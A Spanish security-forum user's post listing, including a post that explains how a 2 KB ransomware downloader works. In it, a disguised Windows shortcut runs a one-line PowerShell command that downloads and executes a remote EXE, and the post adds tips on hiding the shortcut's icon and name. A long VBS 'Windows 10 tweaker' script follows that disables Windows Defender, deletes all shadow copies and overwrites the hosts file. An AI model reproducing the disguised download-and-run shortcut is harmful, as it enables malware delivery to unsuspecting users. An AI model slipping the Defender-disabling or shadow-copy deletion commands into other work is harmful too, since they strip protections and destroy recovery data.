elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10
1  Seguridad Informática / Análisis y Diseño de Malware / Creando un downloader indecetable que ocupa 2 kbytes en: 10 Febrero 2016, 16:01
Hola

Hace tiempo que no me paso por mi sección del foro favorita para compartir nuevas ideas... Recientemente ha llegado a mis manos un virus de tipo ramsonware oculto en un fichero zip (por e-mail), curiosamente mi antivirus no detectó la amenaza, así que me puse a destriparlo en mi VM.

El funcionamiento es muy básico, tras ejecutar el fichero que hay en el ZIP, se ejecuta un ejecutable EXE y se inicia la infección de los ficheros. Hasta aquí todo normal, excepto que el fichero ZIP ocupaba 1,26Kb (descomprimido eran 2Kb…) ¿Cómo podía un fichero de 2Kb cifrar de forma eficiente todos los fichero del disco? La respuesta era fácil, ese fichero de 2Kb no era el ramsonware, sino un pequeño fichero (downloader) que se descargaba una copia del EXE (ramsonware) desde internet y luego lo ejecutaba. Todo ello en un ficherito de 2Kb.

Tras mi análisis pude ver el truco, un simple acceso directo al proceso powershell.exe de Windows y una pequeña línea de código añadida como parámetro del propio acceso directo. Sublime!

El código para descargar y ejecutar un fichero desde internet en PowerShell sería el siguiente:

Código
  1. $c=$env:userprofile+'\tmp.exe';
  2. (New-Object System.Net.WebClient).Downloadfile('https://live.sysinternals.com/procexp.exe',$c);
  3. Start-Process $c

La primera línea define una variable $c con el valor de “C:\Users\usuario_actual\tmp.exe”
La segunda línea crea un nuevo objeto del tipo WebClient y llama a su función DownloadFile, indicando la ruta y el destino ($c)
La tercera línea ejecuta el fichero descargado $c usando Start-Process.

Todo ese código se puede escribir en una sola línea y enviarlo como argumento directamente al proceso powershell.exe usando un acceso directo:





Editando el icono y el nombre podremos disimular el downloader todavía más. Quedando un único fichero de apenas 2Kb completamente funcional.

Os dejo un ejemplo para que entendáis el proceso, es completamente inofensivo. Este acceso directo os descargará y ejecutará el programa ProcessExplorer.exe desde internet

http://www.mediafire.com/download/kj3mtepo8h6zypu/musica.zip

Saludos!!
2  Seguridad Informática / Desafíos - Wargames / Segundo reto: Nivel medio en: 5 Octubre 2015, 01:36
http://aikoncwd.tumblr.com/

A ver que tal os parece éste nuevo reto :)
3  Seguridad Informática / Desafíos - Wargames / Pequeño reto para los usuarios más curiosos en: 30 Septiembre 2015, 22:26
Bueno, he diseñado un pequeño juego/reto para vosotros. Solo los usuarios más curiosos lograrán descifrarlo:



Una pequeña pista: 41 6c 69 65 6e 73
4  Seguridad Informática / Bugs y Exploits / Kali 2.0 released en: 11 Agosto 2015, 23:18
No me voy a expandir demasiado. La distro #1 sobre pen-testing se ha actualizado a la 2.0 hoy mismo:

https://www.kali.org/releases/kali-linux-20-released/

A probar!! :)
5  Sistemas Operativos / Windows / Script para Windows 10 -> Personaliza las opciones ocultas en: 6 Agosto 2015, 14:25
Hola

He creado un pequeño script que permite habilitar o deshabilitar funciones ocultas de Windows 10. Permite deshabilitar esos sirvicios que recopilan información y datos de nuestro equipo, aquí os dejo el link:


http://foro.elhacker.net/scripting/vbs_script_para_personalizar_windows_10-t439704.0.html

Para descargarlo:

Os dejo link de descarga: http://www.mediafire.com/download/tagxum11kudg7b3/Windows+10+by+AikonCWD.rar
Password = aikoncwd
6  Programación / Scripting / [VBS] Script para personalizar Windows 10 en: 6 Agosto 2015, 14:21
Bueno, he decidido ampliar el script para Windows 10, mejorando alguna de las funciones que ya habían y añadiendo nuevas. No creo que saque otra versión, así que la dejamos en v2 final



A continuación explicaré cada una de las funciones del script:

1) Genera un icono llamado God Mode en tu escritorio, desde ese icono podrás acceder a un panel de control "extendido" con muchas opciones para configurar y personalizar tu sistema.

2) Muestra una ventana en la que podrás habilitar o deshabilitar el control de cuentas de usuario (UAC), permitiendo quitar la molesta ventana de confirmación cuando instalamos o ejecutamos algún programa que requiera permisos de Administrador.

3) Ejecuta el limpiador de Windows, permitiendo limpiar y liberar espacio, eliminando ficheros temporales y Windows.old

4) Abre una ventana en la que podrás indicar si deseas utilizar password de acceso al arrancar tu equipo.

5) Permite personalizar las caracteristicas adicionales de Windows, puedes deshabilitar el visor XPS, Internet Explorer o Windows Media Player. Yo lo he configurado así:



6) Muestra un apagina web externa con una recopilación de las combinaciones de teclas de Windows 10

7) Ejecuta una batería de funciones para deshabilitar todos los servicios y tareas programadas encargados de espiar y enviar información a los servidores de Microsoft (Telemtry, DiagTrackLog, servicios, fichero hosts, etc...)

8) Desinstala todos los programas de Microsoft que vienen pre-instalados en Windows 10, os dejo el listado de Apps que se eliminan:



9) Deshabilita OneDrive y su integración con Windows 10

10) Deshabilita Windows Defender y su integración con Windows 10

11) Ejecuta una batería de programas y configuraciones para optimizar y alargar la vida de tu disco duro SSD. Recomendado ejecutar para todos los usuarios que dispongan de un disco duro SSD!



He utilizado las siguientes guías:

https://www.maketecheasier.com/12-things-you-must-do-when-running-a-solid-state-drive-in-windows-7/
http://www.pcworld.com/article/2110095/the-ultimate-guide-to-proper-ssd-management.html
http://www.disk-partition.com/kb/tips-ssd-optimization-windows7-1.html (parte 1, 2 y 3)

12) Muestra el estado de la activación de Windows 10

13) Solo para usuarios con problemas de activación: Ejecuta la activación 30 veces seguidas.

==========================================

Link de descarga: http://www.mediafire.com/download/mddxmqmc7e2emew/Windows_10_by_AikonCWD_v2.rar
Password: aikoncwd

El código fuente, como siempre, disponible para quien quiera revisarlo: http://pastebin.com/3h1ZGViq

Todas las funciones de "spyware" se han agrupado en la opcion (7). Mención especial a las 2 nuevas opciones para mejorar el rendimiento y vida de tu SSD y la posibilidad de desinstalar todas las Apps de Microsoft que vienen pre-instaladas. La opción (7) se ha mejorado añadiendo nuevas entradas de spyware descubiertas ésta semana.

Saludos, espero comentarios y feedback! :)

Código
  1.  
  2.  
  3.    Set oWSH = CreateObject("WScript.Shell")
  4.    Set oNET = CreateObject("WScript.Network")
  5.    Set oAPP = CreateObject("Shell.Application")
  6.    Set oFSO = CreateObject("Scripting.FileSystemObject")
  7.    Set oWMI = GetObject("winmgmts:\\.\root\CIMV2")
  8.    Set oARG = WScript.Arguments
  9.  
  10.    Call ForceConsole()
  11.    Call showBanner()
  12.    Call checkW10()
  13.    Call runElevated()
  14.    Call printf(" Requisitos OK...")
  15.    Call showMenu()
  16.  
  17.    Function printf(txt)
  18.            WScript.StdOut.WriteLine txt
  19.    End Function
  20.  
  21.    Function printl(txt)
  22.            WScript.StdOut.Write txt
  23.    End Function
  24.  
  25.    Function scanf()
  26.            scanf = LCase(WScript.StdIn.ReadLine)
  27.    End Function
  28.  
  29.    Function Wait(n)
  30.            WScript.Sleep Int(n * 1000)
  31.    End Function
  32.  
  33.    Function ForceConsole()
  34.            If InStr(LCase(WScript.FullName), "cscript.exe") = 0 Then
  35.                    oWSH.Run "cscript //NoLogo " & Chr(34) & WScript.ScriptFullName & Chr(34)
  36.                    WScript.Quit
  37.            End If
  38.    End Function
  39.  
  40.    Function showBanner()
  41.            printf ""
  42.            printf " #############################"
  43.            printf " #                           #"
  44.            printf " # WINDOWS 10 SCRIPT TWEAKER #"
  45.            printf " # by AikonCWD               #"
  46.            printf " #                      v2.0 #"
  47.            printf " #############################"
  48.            printf ""
  49.            printf " Comprobando requisitos del sistema..."
  50.    End Function
  51.  
  52.    Function checkW10()
  53.            If getNTversion < 10 Then
  54.                    printf " ERROR: Necesitas ejecutar este script bajo Windows 10"
  55.                    printf ""
  56.                    printf " Press <enter> to quit"
  57.                    scanf
  58.                    WScript.Quit
  59.            End IF
  60.    End Function
  61.  
  62.    Function runElevated()
  63.            If isUACRequired Then
  64.                    If Not isElevated Then RunAsUAC
  65.            Else
  66.                    If Not isAdmin Then
  67.                            printf " ERROR: Necesitas ejecutar este script como Administrador!"
  68.                            printf ""
  69.                            printf " Press <enter> to quit"
  70.                            scanf
  71.                            WScript.Quit
  72.                    End If
  73.            End If
  74.    End Function
  75.  
  76.    Function isUACRequired()
  77.            r = isUAC()
  78.            If r Then
  79.                    intUAC = oWSH.RegRead("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA")
  80.                    r = 1 = intUAC
  81.            End If
  82.            isUACRequired = r
  83.    End Function
  84.  
  85.    Function isElevated()
  86.            isElevated = CheckCredential("S-1-16-12288")
  87.    End Function
  88.  
  89.    Function isAdmin()
  90.            isAdmin = CheckCredential("S-1-5-32-544")
  91.    End Function
  92.  
  93.    Function CheckCredential(p)
  94.            Set oWhoAmI = oWSH.Exec("whoami /groups")
  95.            Set WhoAmIO = oWhoAmI.StdOut
  96.            WhoAmIO = WhoAmIO.ReadAll
  97.            CheckCredential = InStr(WhoAmIO, p) > 0
  98.    End Function
  99.  
  100.    Function RunAsUAC()
  101.            If isUAC Then
  102.                    printf ""
  103.                    printf " El script necesita ejecutarse con permisos elevados..."
  104.                    printf " acepta el siguiente mensaje:"
  105.                    Wait(2)
  106.                    oAPP.ShellExecute "cscript", "//NoLogo " & Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1
  107.                    WScript.Quit
  108.            End If
  109.    End Function
  110.  
  111.    Function isUAC()
  112.            Set cWin = oWMI.ExecQuery("SELECT * FROM Win32_OperatingSystem")
  113.            r = False
  114.            For Each OS In cWin
  115.                    If Split(OS.Version,".")(0) > 5 Then
  116.                            r = True
  117.                    Else
  118.                            r = False
  119.                    End If
  120.            Next
  121.            isUAC = r
  122.    End Function
  123.  
  124.    Function getNTversion()
  125.            Set cWin = oWMI.ExecQuery("SELECT * FROM Win32_OperatingSystem")
  126.            For Each OS In cWin
  127.                    getNTversion = Split(OS.Version,".")(0)
  128.            Next
  129.    End Function
  130.  
  131.    Function cls()
  132.            For i = 1 To 100
  133.                    printf ""
  134.            Next
  135.    End Function
  136.  
  137.    Function showMenu()
  138.            Wait(2)
  139.            cls
  140.            printf " #############################"
  141.            printf " #                           #"
  142.            printf " # WINDOWS 10 SCRIPT TWEAKER #"
  143.            printf " # by AikonCWD               #"
  144.            printf " #                      v2.0 #"
  145.            printf " #############################"
  146.            printf ""
  147.            printf ""
  148.            printf " Selecciona una opcion:"
  149.            printf ""
  150.            printf "   1 = Habilitar icono en escritorio: Modo Dios"
  151.            printf "   2 = Deshabilitar Control de Cuentas de Usuario (UAC)"
  152.            printf "   3 = Ejecutar limpiador de Windows. Libera espacio y borrar Windows.old"
  153.            printf "   4 = Habilitar/Deshabilitar inicio de sesion sin password"
  154.            printf "   5 = Mostrar web con combinacion de teclas utiles en Win10"
  155.            printf "   6 = Instalar/Desinstalar caracteristicas de Windows"
  156.            printf ""
  157.            printf "   7 = Impedir que Microsoft recopile informacion de este equipo"
  158.            printf "   8 = Desinstalar Metro Apps pre-instaladas en Windows 10"
  159.            printf "   9 = Deshabilitar OneDrive"
  160.            printf "  10 = Deshabilitar Windows Defender"
  161.            printf ""
  162.            printf "  11 = Optimizar y prolongar la vida de tu disco duro SSD"
  163.            printf ""
  164.            printf "  12 = Mostrar estado de la activacion de Windows 10"
  165.            printf "  13 = Activar Windows 10: Ejecutar slmgr /ato 30 veces seguidas"
  166.            printf ""
  167.            printf "   0 = Salir"
  168.            printf ""
  169.            printl " > "
  170.            RP = scanf
  171.            If Not isNumeric(RP) = True Then
  172.                    printf ""
  173.                    printf " ERROR: Opcion invalida, solo se permiten numero..."
  174.                    Call showMenu()
  175.                    Exit Function
  176.            End If
  177.            Select Case RP
  178.                    Case 1
  179.                            Call createGodMode()
  180.                    Case 2
  181.                            Call disableUAC()
  182.                    Case 3
  183.                            Call cleanSO()
  184.                    Case 4
  185.                            Call noPWD()
  186.                    Case 5
  187.                            Call showKeyboardTips()
  188.                    Case 6
  189.                            Call optionalFeatures()
  190.                    Case 7
  191.                            Call disableSpyware()
  192.                    Case 8
  193.                            Call cleanApps()
  194.                    Case 9
  195.                            Call disableOneDrive()
  196.                    Case 10
  197.                            Call disableDefender()
  198.                    Case 11
  199.                            Call powerSSD()
  200.                    Case 12
  201.                            Call showActivation()
  202.                    Case 13
  203.                            Call activate30()
  204.                    Case 0
  205.                            printf ""
  206.                            printf " Gracias por utilizar mi script"
  207.                            printf " AikonCWD dice adios!! ;D"
  208.                            wait(2)
  209.                            WScript.Quit
  210.                    Case Else
  211.                    printf ""
  212.                    printf " INFO: Opcion invalida, ese numero no esta disponible"
  213.                    Call showMenu()
  214.                    Exit Function
  215.            End Select
  216.    End Function
  217.  
  218.    Function createGodMode()
  219.            godFolder = oWSH.SpecialFolders("Desktop") & "\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"
  220.            If oFSO.FolderExists(godFolder) = False Then
  221.                    oFSO.CreateFolder(godFolder)
  222.                    printf ""
  223.                    printf " INFO: Se ha creado un acceso directo en tu escritorio"
  224.                    Call showMenu
  225.            Else
  226.                    printf ""
  227.                    printf " INFO: Ya existe el modo dios, ejecutalo desde tu Escritorio"
  228.                    call showMenu
  229.            End If
  230.    End Function
  231.  
  232.    Function disableUAC()
  233.            printf ""
  234.            printf " Ahora se ejecutara una ventana..."
  235.            printf " Mueve la barra vertical hasta el nivel mas bajo"
  236.            printf " Acepta los cambios y reinicia el ordenador"
  237.            wait(2)
  238.            printf ""
  239.            printf " INFO: Executing UserAccountControlSettings.exe"
  240.            oWSH.Run "UserAccountControlSettings.exe"
  241.            Call showMenu
  242.    End Function
  243.  
  244.    Function cleanSO()
  245.            printf ""
  246.            printf " Ahora se ejecutara una ventana..."
  247.            printf " Marca las opciones deseadas de limpieza"
  248.            printf " Acepta los cambios y reinicia el ordenador"
  249.            wait(2)
  250.            printf ""
  251.            printf " INFO: Executing cleanmgr.exe"
  252.            oWSH.Run "cleanmgr.exe"
  253.            Call showMenu
  254.    End Function
  255.  
  256.    Function noPWD()
  257.            printf ""
  258.            printf " Ahora se ejecutara una ventana..."
  259.            printf " Desmarca la opcion: Los usuarios deben escribir su nombre y password para usar el equipo"
  260.            printf " Acepta los cambios y reinicia el ordenador"
  261.            wait(2)
  262.            printf ""
  263.            printf " INFO: Executing control userpasswords2"
  264.            oWSH.Run "control userpasswords2"
  265.            Call showMenu
  266.    End Function
  267.  
  268.    Function optionalFeatures()
  269.            printf ""
  270.            printf " Ahora se ejecutara una ventana..."
  271.            printf " Marca/Desmarca las opciones deseadas"
  272.            printf " Acepta los cambios y reinicia el ordenador"
  273.            wait(2)
  274.            printf ""
  275.            printf " INFO: Executing optionalfeatures.exe"
  276.            oWSH.Run "optionalfeatures.exe"
  277.            Call showMenu
  278.    End Function
  279.  
  280.    Function showKeyboardTips()
  281.            printf ""
  282.            printf " Ahora se ejecutara una pagina web..."
  283.            printf " En ella encontraras todas las combinaciones de teclas utiles en Win10"
  284.            wait(2)
  285.            printf ""
  286.            printf " INFO: Executing web-browser"
  287.            oWSH.Run "http://reviews.gizmodo.com/the-ultimate-guide-to-windows-10-keyboard-shortcuts-1720656591"
  288.            Call showMenu
  289.    End Function
  290.  
  291.    Function disableSpyware()
  292.            printf ""
  293.            printf " Deshabilitando Telemetry usando el registro..."
  294.            wait(1)
  295.                    oWSH.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection\AllowTelemetry", 0, "REG_DWORD"
  296.                    oWSH.RegWrite "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\DataCollection\AllowTelemetry", 0, "REG_DWORD"
  297.            printf ""
  298.            printf " INFO: Telemetry deshabilitado correctamente"
  299.  
  300.            pathLOG = oWSH.ExpandEnvironmentStrings("ProgramData") & "\Microsoft\Diagnosis\ETLLogs\AutoLogger\AutoLogger-Diagtrack-Listener.etl"
  301.            printf ""
  302.            printf " Borrando DiagTrack Log..."
  303.            wait(1)
  304.                    If oFSO.FileExists(pathLOG) Then oFSO.DeleteFile(pathLOG)
  305.            printf ""
  306.            printf " INFO: DiagTrack Log borrado correctamente"
  307.  
  308.            printf ""
  309.            printf " Deshabilitando servicios de seguimiento..."
  310.            wait(1)
  311.                    oWSH.Run "sc stop DiagTrack"
  312.                    oWSH.Run "sc stop RetailDemo"
  313.                    oWSH.Run "sc stop dmwappushservice"
  314.                    oWSH.Run "sc config DiagTrack start=disabled"
  315.                    oWSH.Run "sc config RetailDemo start=disabled"
  316.                    oWSH.Run "sc config dmwappushservice start=disabled"
  317.            printf ""
  318.            printf " INFO: Servicios de seguimiento deshabilitados"
  319.  
  320.            printf ""
  321.            printf " Deshabilitando tareas programadas que envian datos a Microsoft..."    
  322.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" & chr(34) & " /DISABLE"
  323.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Application Experience\ProgramDataUpdater" & chr(34) & " /DISABLE"
  324.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" & chr(34) & " /DISABLE"
  325.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" & chr(34) & " /DISABLE"
  326.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" & chr(34) & " /DISABLE"
  327.            oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" & chr(34) & " /DISABLE"
  328.            printf ""
  329.            printf " INFO: Tareas programadas de seguimiento deshabilitadas"
  330.  
  331.            printf ""
  332.            printf " Deshabilitando acceso a los servidores de publicidad de Microsoft..."
  333.            wait(1)
  334.            Set F = oFSO.CreateTextFIle("C:\Windows\System32\drivers\etc\hosts", True)
  335.                    F.WriteLine "127.0.0.1  localhost"
  336.                    F.WriteLine "127.0.0.1  localhost.localdomain"
  337.                    F.WriteLine "255.255.255.255    broadcasthost"
  338.                    F.WriteLine "::1                localhost"
  339.                    F.WriteLine "127.0.0.1  local"
  340.                    F.WriteLine "0.0.0.0 vortex.data.microsoft.com"
  341.                    F.WriteLine "0.0.0.0 vortex-win.data.microsoft.com"
  342.                    F.WriteLine "0.0.0.0 telecommand.telemetry.microsoft.com"
  343.                    F.WriteLine "0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net"
  344.                    F.WriteLine "0.0.0.0 oca.telemetry.microsoft.com"
  345.                    F.WriteLine "0.0.0.0 oca.telemetry.microsoft.com.nsatc.net"
  346.                    F.WriteLine "0.0.0.0 sqm.telemetry.microsoft.com"
  347.                    F.WriteLine "0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net"
  348.                    F.WriteLine "0.0.0.0 watson.telemetry.microsoft.com"
  349.                    F.WriteLine "0.0.0.0 watson.telemetry.microsoft.com.nsatc.net"
  350.                    F.WriteLine "0.0.0.0 redir.metaservices.microsoft.com"
  351.                    F.WriteLine "0.0.0.0 choice.microsoft.com"
  352.                    F.WriteLine "0.0.0.0 choice.microsoft.com.nsatc.net"
  353.                    F.WriteLine "0.0.0.0 df.telemetry.microsoft.com"
  354.                    F.WriteLine "0.0.0.0 reports.wes.df.telemetry.microsoft.com"
  355.                    F.WriteLine "0.0.0.0 wes.df.telemetry.microsoft.com"
  356.                    F.WriteLine "0.0.0.0 services.wes.df.telemetry.microsoft.com"
  357.                    F.WriteLine "0.0.0.0 sqm.df.telemetry.microsoft.com"
  358.                    F.WriteLine "0.0.0.0 telemetry.microsoft.com"
  359.                    F.WriteLine "0.0.0.0 watson.ppe.telemetry.microsoft.com"
  360.                    F.WriteLine "0.0.0.0 telemetry.appex.bing.net"
  361.                    F.WriteLine "0.0.0.0 telemetry.urs.microsoft.com"
  362.                    F.WriteLine "0.0.0.0 telemetry.appex.bing.net:443"
  363.                    F.WriteLine "0.0.0.0 settings-sandbox.data.microsoft.com"
  364.                    F.WriteLine "0.0.0.0 vortex-sandbox.data.microsoft.com"
  365.                    F.WriteLine "0.0.0.0 survey.watson.microsoft.com"
  366.                    F.WriteLine "0.0.0.0 watson.live.com"
  367.                    F.WriteLine "0.0.0.0 watson.microsoft.com"
  368.                    F.WriteLine "0.0.0.0 statsfe2.ws.microsoft.com"
  369.                    F.WriteLine "0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com"
  370.                    F.WriteLine "0.0.0.0 compatexchange.cloudapp.net"
  371.                    F.WriteLine "0.0.0.0 cs1.wpc.v0cdn.net"
  372.                    F.WriteLine "0.0.0.0 a-0001.a-msedge.net"
  373.                    F.WriteLine "0.0.0.0 statsfe2.update.microsoft.com.akadns.net"
  374.                    F.WriteLine "0.0.0.0 sls.update.microsoft.com.akadns.net"
  375.                    F.WriteLine "0.0.0.0 fe2.update.microsoft.com.akadns.net"
  376.                    F.WriteLine "0.0.0.0 65.55.108.23 "
  377.                    F.WriteLine "0.0.0.0 65.39.117.230"
  378.                    F.WriteLine "0.0.0.0 23.218.212.69 "
  379.                    F.WriteLine "0.0.0.0 134.170.30.202"
  380.                    F.WriteLine "0.0.0.0 137.116.81.24"
  381.                    F.WriteLine "0.0.0.0 diagnostics.support.microsoft.com"
  382.                    F.WriteLine "0.0.0.0 corp.sts.microsoft.com"
  383.                    F.WriteLine "0.0.0.0 statsfe1.ws.microsoft.com"
  384.                    F.WriteLine "0.0.0.0 pre.footprintpredict.com"
  385.                    F.WriteLine "0.0.0.0 204.79.197.200"
  386.                    F.WriteLine "0.0.0.0 23.218.212.69"
  387.                    F.WriteLine "0.0.0.0 i1.services.social.microsoft.com"
  388.                    F.WriteLine "0.0.0.0 i1.services.social.microsoft.com.nsatc.net"
  389.                    F.WriteLine "0.0.0.0 feedback.windows.com"
  390.                    F.WriteLine "0.0.0.0 feedback.microsoft-hohm.com"
  391.                    F.WriteLine "0.0.0.0 feedback.search.microsoft.com"
  392.            F.Close
  393.            printf ""
  394.            printf " INFO: Fichero HOSTS escrito correctamente"
  395.  
  396.            Call showMenu
  397.    End Function
  398.  
  399.    Function disableOneDrive()
  400.            printf ""
  401.            printf " Deshabilitando OneDrive usando el registro..."
  402.            wait(1)
  403.                    oWSH.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows\OneDrive\DisableFileSyncNGSC", 1, "REG_DWORD"
  404.                    oWSH.RegWrite "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\OneDrive\DisableFileSyncNGSC", 1, "REG_DWORD"
  405.            printf ""
  406.            printf " INFO: OneDrive deshabilitado correctamente"
  407.            Call showMenu
  408.    End Function
  409.  
  410.    Function disableDefender()
  411.            printf ""
  412.            printf " Deshabilitando Windows Defender usando el registro..."
  413.            wait(1)
  414.                    oWSH.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
  415.                    oWSH.RegWrite "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
  416.            printf ""
  417.            printf " INFO: Windows Defender deshabilitado correctamente"
  418.            printf " WARNING: Si no tienes antivirus, te recomiendo 360 Total Security: www.360totalsecurity.com"
  419.            wait(1)
  420.            Call showMenu
  421.    End Function
  422.  
  423.    Function showActivation()
  424.            printf ""
  425.            printf " En unos segundos aparecera el estado de tu activacion..."
  426.            wait(1)
  427.                    oWSH.Run "slmgr.vbs /dlv"
  428.                    oWSH.Run "slmgr.vbs /xpr"
  429.            printf ""
  430.            printf " INFO: Script slmgr ejecutado correctamente"
  431.            Call showMenu
  432.    End Function
  433.  
  434.    Function activate30()
  435.            printf ""
  436.            printf " Esta funcion sirve para forzar la activacion de Windows 10"
  437.            printf " solo se debe utilizar si tienes problemas para validar la licencia"
  438.            printf ""
  439.            printl " El proceso demora varios minutos. Deseas continuar? (s/n) "
  440.  
  441.            If scanf <> "s" Then
  442.                    printf ""
  443.                    printf " INFO: Proceso cancelado por el usuario"
  444.                    wait(1)
  445.                    Call showMenu
  446.                    Exit Function
  447.            End If
  448.  
  449.            printf " Se va a ejecutar slmgr /ato 30 veces, sea paciente..."
  450.            wait(1)
  451.                    For i = 1 To 30
  452.                            printf "  > (" & i & ") Ejecutando slmgr.vbs /ato"
  453.                            oWSH.Run "slmgr.vbs /ato"
  454.                    Next
  455.            printf ""
  456.            printf " INFO: Script slmgr ejecutado correctamente"
  457.            printf " INFO: El resultado tarda unos segundos en aparecer, espere..."
  458.            wait(1)
  459.            Call showMenu
  460.    End Function
  461.  
  462.    Function cleanApps()
  463.            printf ""
  464.            printf " Este script va a desinstalar el siguiente listado de Apps:"
  465.            printf ""
  466.            printf "  > Bing"
  467.            printf "  > Zune"
  468.            printf "  > Skype"
  469.            printf "  > XboxApp"
  470.            printf "  > OneNote"
  471.            printf "  > 3DBuilder"
  472.            printf "  > Getstarted"
  473.            printf "  > Windows Maps"
  474.            printf "  > Windows Phone"
  475.            printf "  > Windows Camera"
  476.            printf "  > Windows Alarms"
  477.            printf "  > Windows Sound Recorder"
  478.            printf "  > Windows Communications Apps"
  479.            printf "  > Microsoft People"
  480.            printf "  > Microsoft Office Hub"
  481.            printf "  > Microsoft Solitaire Collection"
  482.            printf ""
  483.            printl " La opcion no es reversible. Deseas continuar? (s/n) "
  484.  
  485.            If scanf = "s" Then
  486.                    oWSH.Run "powershell get-appxpackage -Name *Bing* | Remove-AppxPackage", 1, True
  487.                    oWSH.Run "powershell get-appxpackage -Name *Zune* | Remove-AppxPackage", 1, True
  488.                    oWSH.Run "powershell get-appxpackage -Name *XboxApp* | Remove-AppxPackage", 1, True
  489.                    oWSH.Run "powershell get-appxpackage -Name *OneNote* | Remove-AppxPackage", 1, True
  490.                    oWSH.Run "powershell get-appxpackage -Name *SkypeApp* | Remove-AppxPackage", 1, True
  491.                    oWSH.Run "powershell get-appxpackage -Name *3DBuilder* | Remove-AppxPackage", 1, True
  492.                    oWSH.Run "powershell get-appxpackage -Name *Getstarted* | Remove-AppxPackage", 1, True
  493.                    oWSH.Run "powershell get-appxpackage -Name *Microsoft.People* | Remove-AppxPackage", 1, True
  494.                    oWSH.Run "powershell get-appxpackage -Name *MicrosoftOfficeHub* | Remove-AppxPackage", 1, True
  495.                    oWSH.Run "powershell get-appxpackage -Name *MicrosoftSolitaireCollection* | Remove-AppxPackage", 1, True
  496.                    oWSH.Run "powershell get-appxpackage -Name *WindowsCamera* | Remove-AppxPackage", 1, True
  497.                    oWSH.Run "powershell get-appxpackage -Name *WindowsAlarms* | Remove-AppxPackage", 1, True
  498.                    oWSH.Run "powershell get-appxpackage -Name *WindowsMaps* | Remove-AppxPackage", 1, True
  499.                    oWSH.Run "powershell get-appxpackage -Name *WindowsPhone* | Remove-AppxPackage", 1, True
  500.                    oWSH.Run "powershell get-appxpackage -Name *WindowsSoundRecorder* | Remove-AppxPackage", 1, True
  501.                    oWSH.Run "powershell get-appxpackage -Name *windowscommunicationsapps* | Remove-AppxPackage", 1, True
  502.                    printf ""
  503.                    printf " INFO: Las Apps se han desinstalado correctamente..."
  504.            Else
  505.                    printf ""
  506.                    printf " INFO: Operacion cancelada por el usuario"
  507.            End If
  508.            wait(1)
  509.            Call showMenu
  510.    End Function
  511.  
  512.    Function powerSSD()
  513.            printf ""
  514.            printf " Este script va a modificar las siguientes configuraciones:"
  515.            printf ""
  516.            printf "  > Habilitar TRIM"
  517.            printf "  > Deshabilitar VSS (Shadow Copy)"
  518.            printf "  > Deshabilitar Windows Search + Indexing Service"
  519.            printf "  > Deshabilitar defragmentador de discos"
  520.            printf "  > Deshabilitar hibernacion del sistema"
  521.            printf "  > Deshabilitar Prefetcher + Superfetch"
  522.            printf "  > Deshabilitar ClearPageFileAtShutdown + LargeSystemCache"
  523.            printf ""
  524.            printl " Deseas continuar? (s/n) "
  525.  
  526.            If scanf = "s" Then
  527.                    printf ""
  528.                    oWSH.Run "fsutil behavior set disabledeletenotify 0"
  529.                    printf " # TRIM habilitado"
  530.                    wait(1)
  531.                    oWSH.Run "vssadmin Delete Shadows /All /Quiet"
  532.                    oWSH.Run "sc stop VSS"
  533.                    oWSH.Run "sc config VSS start=disabled"
  534.                    printf " # Shadow Copy eliminada y deshabilitada"
  535.                    wait(1)
  536.                    oWSH.Run "sc stop WSearch"
  537.                    oWSH.Run "sc config WSearch start=disabled"
  538.                    printf " # Windows Search + Indexing Service deshabilitados"
  539.                    wait(1)
  540.                    oWSH.Run "schtasks /change /TN " & chr(34) & "\Microsoft\Windows\Defrag\ScheduledDefrag" & chr(34) & " /DISABLE"
  541.                    printf " # Defragmentador de disco deshabilitado"
  542.                    wait(1)
  543.                    oWSH.Run "powercfg -h off"
  544.                    printf " # Hibernacion deshabilitada"
  545.                    wait(1)
  546.                    oWSH.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher", 0, "REG_DWORD"
  547.                    oWSH.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnableSuperfetch", 0, "REG_DWORD"
  548.                    oWSH.Run "sc stop SysMain"
  549.                    oWSH.Run "sc config SysMain start=disabled"
  550.                    printf " # Prefetcher + Superfetch deshabilitados"
  551.                    wait(1)
  552.                    oWSH.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown", 0, "REG_DWORD"
  553.                    oWSH.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\LargeSystemCache", 0, "REG_DWORD"
  554.                    printf " # ClearPageFileAtShutdown + LargeSystemCache deshabilitados"
  555.                    wait(1)
  556.                    printf ""
  557.                    printf " INFO: Felicidades, acabas de prolongar la vida y el rendimiento de tu SSD"    
  558.            Else
  559.                    printf ""
